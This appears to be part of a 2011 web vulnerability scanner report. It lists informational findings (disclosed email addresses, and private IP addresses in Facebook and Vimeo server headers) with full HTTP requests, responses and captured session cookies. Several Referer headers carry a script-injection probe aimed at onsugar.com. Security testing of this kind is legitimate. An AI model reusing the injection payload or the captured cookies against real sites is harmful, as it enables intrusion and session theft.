* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.remote = function(output, settings, callback) {

callback = callback || function() {};
if (typeof settings == 'function') { // shift arguments
callback = settings;
}


...[SNIP]...
current value matches the href attribute of the matched element.
*
* @type jQuery
*
* @name history
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.history = function(callback) {
return this.click(function(e) {
// add to history only if true click occured, not a triggered click
if (e.clientX) {
$.a
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
   if (typeof value != 'undefined') { // name and value given, set cookie
       options = options || {};
       if (value === null) {
           value = '';
           option
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

13.19. http://www.popsugar.com/ajaxharness

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ajaxharness?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 213380
Date: Mon, 12 Sep 2011 12:47:57 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831677%7C4rKS2S0tUEAw%2FPSqsUWVtSmuIoYL0q9Jw8K5Dmnwz6q%2FsDXs%2BlLhGi%2F7UJ81NlU7nVxY6mcTcBwYD5tn0e1sYPWUKt1Zxe1GMPGeUjdMgE1nefSrrjH758DCT%2BLe6XijyBl1F2pRC3ztkQ6Sb9nmCSV18VS7YX%2BzR5gblWNTBGlNXo13Lde1o3bdgY7zzHkM9Dw2%2Fvxo6dn0YaVAACjkVw%3D%3D%7C9cb6eff54ecc9dfd5bd9438bb38f7dd11e46c683; expires=Wed, 05-Oct-2011 16:21:17 GMT; path=/; httponly

{"replacements":{"sugar-menu-subnav-items":" \n \n \n\n\n\n\n<div id='sn-popsugar' class='site-dropdown popsugar-hp '>\n <div class='sn-col sn-col-1'>\n
...[SNIP]...
eed is any mobile phone with email capabilities, and you can create posts with text and photos from your cell, anytime and anywhere! Join the group and set up your account by emailing a blank email to savory-sights@onsugar.com from the same email your account is associated. Once your account is confirmed you can send all of your delicious food photos to this group via your mobile. Be sure to save savory-sights@onsugar.com in your email contacts. \r\n If you need extra help check out the \n\t\t\t\t\t<\/span>
...[SNIP]...
eed is any mobile phone with email capabilities, and you can create posts with text and photos from your cell, anytime and anywhere! Join the group and set up your account by emailing a blank email to spotted@onsugar.com from the same email your account is associated. Once your account is confirmed you can send all of your adorable pet pictures to this group via your mobile. Be sure to save spotted@onsugar.com in your email contacts. \r\n If you need extra help check out the \n\t\t\t\t\t<\/span>
...[SNIP]...

13.20. http://www.symantec.com/connect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The following email address was disclosed in the response:

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:28:52 +0000
Vary: Cookie
ETag: "1315830532"
Content-Type: text/html; charset=utf-8
X-Varnish: 1371254795 1371243899
X-Varnish-Cache: HIT
X-Varnish-Hits: 220
Vary: Accept-Encoding
Content-Length: 80288
Cache-Control: public, max-age=2472
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
Exams for FREE &ndash; Register now!
The first 100 candidates (customers or partners) to register for an SCS Certification or STS Accreditation exam will be able to take an exam for FREE!&nbsp; Email Customer_Certifications@Symantec.com&nbsp;or Partner... </div>
...[SNIP]...

14. Private IP addresses disclosed
There are 37 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


14.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.connect.facebook.com
Path:   /static/v0.4/client_restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/v0.4/client_restserver.php?r=1315319968 HTTP/1.1
Host: api.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 501
Content-Type: text/html; charset=utf-8
Expires: Tue, 11 Sep 2012 13:03:51 GMT
X-FB-Server: 10.28.9.126
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:51 GMT

<!DOCTYPE html><html><head><title>Host Page</title><meta charset="utf-8" /></head><body><p>Client Server</p><script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php"></scr
...[SNIP]...

14.2. http://connect.facebook.net/en_US/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315849736549 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "5eb17beefa9c10401e449634ea0d98db"
X-FB-Server: 10.32.173.117
X-Cnection: close
Content-Length: 136250
Cache-Control: public, max-age=1152
Expires: Mon, 12 Sep 2011 13:08:39 GMT
Date: Mon, 12 Sep 2011 12:49:27 GMT
Connection: close
Vary: Accept-Encoding

/*1315831719,169913717,JIT Construction: v438319,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

14.3. http://connect.facebook.net/en_US/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315850661827 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "5eb17beefa9c10401e449634ea0d98db"
X-FB-Server: 10.27.133.131
X-Cnection: close
Content-Length: 136250
Cache-Control: public, max-age=1200
Expires: Mon, 12 Sep 2011 13:24:03 GMT
Date: Mon, 12 Sep 2011 13:04:03 GMT
Connection: close
Vary: Accept-Encoding

/*1315832643,169575811,JIT Construction: v438319,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

14.4. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBrHuKkpJgP0-8C&w=90&h=90&url=http%3A%2F%2Ftwitpic.com%2Fshow%2Fthumb%2F6hd3in.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.119.42
X-Cnection: close
Content-Length: 2607
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 13 Sep 2011 12:48:18 GMT
Date: Mon, 12 Sep 2011 12:48:18 GMT
Connection: close

...[SNIP]...

14.5. http://external.ak.fbcdn.net/safe_image.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQA-vbuzXFFaeubu&w=90&h=90&url=http%3A%2F%2F2media.nowpublic.net%2Fimages%2F%2F11%2F29%2F1129b1595f1fe130542bb003ca3f4915.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.52.34
X-Cnection: close
Content-Length: 2473
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 13 Sep 2011 12:48:26 GMT
Date: Mon, 12 Sep 2011 12:48:26 GMT
Connection: close

...[SNIP]...

14.6. http://player.vimeo.com/video/19872101

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/19872101

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /video/19872101?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.803795514.1314813682.1314847150.1314978007.3; __utmz=256147786.1314978007.3.3.utmcsr=blog.sipvicious.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.119
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Cargoh Artist Profile - Indigo</title><!--[if lt IE 9]><style>.a.d .z {display: block;}.a.d .bj {background: #000;filter: alpha(opacit
...[SNIP]...

14.7. http://static.ak.connect.facebook.com/connect.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://api.connect.facebook.com/static/v0.4/client_restserver.php?r=1315319968
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "a41b2933626b3fe823a65fbe80ad9685"
X-FB-Server: 10.27.62.103
X-Cnection: close
Content-Length: 18454
Cache-Control: public, max-age=485
Expires: Mon, 12 Sep 2011 13:11:56 GMT
Date: Mon, 12 Sep 2011 13:03:51 GMT
Connection: close
Vary: Accept-Encoding

/*1315628827,169557607,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

14.8. http://static.ak.connect.facebook.com/connect.php/en_US

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "a41b2933626b3fe823a65fbe80ad9685"
X-FB-Server: 10.33.27.108
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=707
Expires: Mon, 12 Sep 2011 13:15:39 GMT
Date: Mon, 12 Sep 2011 13:03:52 GMT
Connection: close

/*1315629014,169941868,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

14.9. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
ETag: "8ce952d2c65a22739ac5aff98a6707a7"
X-FB-Server: 10.32.155.118
X-Cnection: close
Content-Length: 14288
Vary: Accept-Encoding
Cache-Control: public, max-age=547
Expires: Mon, 12 Sep 2011 13:12:58 GMT
Date: Mon, 12 Sep 2011 13:03:51 GMT
Connection: close

/*1311721510,169909110,JIT Construction: v411252,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...

14.10. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "faf217372bac91b0c9a6b77b116e7248"
X-FB-Server: 10.32.187.126
X-Cnection: close
Content-Length: 211324
Cache-Control: public, max-age=664
Expires: Mon, 12 Sep 2011 13:14:55 GMT
Date: Mon, 12 Sep 2011 13:03:51 GMT
Connection: close
Vary: Accept-Encoding

/*1315629037,169917310,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

14.11. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "a41b2933626b3fe823a65fbe80ad9685"
X-FB-Server: 10.27.48.111
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=589
Expires: Mon, 12 Sep 2011 13:13:39 GMT
Date: Mon, 12 Sep 2011 13:03:50 GMT
Connection: close

/*1315628853,169554031,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

14.12. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/modules/facebook_connect/xd_receiver.php
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.27.220.109
X-Cnection: close
Content-Length: 3386
Cache-Control: max-age=40190
Expires: Tue, 13 Sep 2011 00:13:42 GMT
Date: Mon, 12 Sep 2011 13:03:52 GMT
Connection: close
Vary: Accept-Encoding

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...

14.13. http://www.facebook.com/ajax/connect/connect_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.64.130.30
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:30 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u231039_1\\\">\\u00
...[SNIP]...

14.14. http://www.facebook.com/ajax/connect/connect_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.62.134.39
X-Cnection: close
Date: Mon, 12 Sep 2011 13:08:40 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u292038_1\\\">\\u00
...[SNIP]...

14.15. http://www.facebook.com/ajax/connect/connect_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

